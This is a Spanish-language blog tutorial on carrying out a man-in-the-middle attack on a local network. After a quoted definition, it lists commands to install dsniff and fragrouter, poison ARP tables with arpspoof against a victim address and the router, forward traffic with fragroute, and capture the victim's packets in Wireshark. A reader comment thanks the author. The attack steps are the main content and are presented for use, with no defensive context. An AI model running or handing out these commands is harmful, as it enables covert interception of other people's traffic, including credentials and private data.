Quote wikipedia: "En criptografía, un ataque man-in-the-middle es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas."
Lo que pretendemos en hacernos pasar por el router para interceptar paquetes (un router switch no deja esnifarse).
- Para llevar a cabo esta ataque, tendremos que tener instalado dsniff y fragrouter.
^Instalar dsniff^:
sudo apt-get install dsniff
^Instalar fragrouter^ (o descargando el paquete y haciendo manualmente):
sudo apt-get install fragrouter
- Lo primero que tendremos que hacer es spoofear las peticiones arp. Para ello, escribimos:
sudo arpspoof -i NOMBRE TARJETA DE RED -t IP VÍCTIMA IP ROUTER
que quedaría como, por ejemplo:
sudo arpspoof -i eth1 -t 192.168.1.33 192.168.1.1
- Una vez hecho esto, solo hace falta hacer el enrutado hacia nuestro equipo. Para ello, escribimos:
fragroute -B1
-Ahora todo el tráfico estará dirigido hacia nuestra máquina y seremos capaces de esnifear todo el tráfico que pase por nosotoros.
Para escanear el tráfico, tendremos que instalar wireshark:
sudo apt-get install wireshark
Una vez instalado, "run as root", selecciona tu interfaz y pon un filtro para que esnifee todo el tráfico del "cliente":
ip.src == 192.168.1.33
Imágen de escaneo de tráfico.**Fuentes**
Andalinux ; wOOwOO ; Wikipedia
muy bueno el tuto! gracias monzi!
ResponderEliminar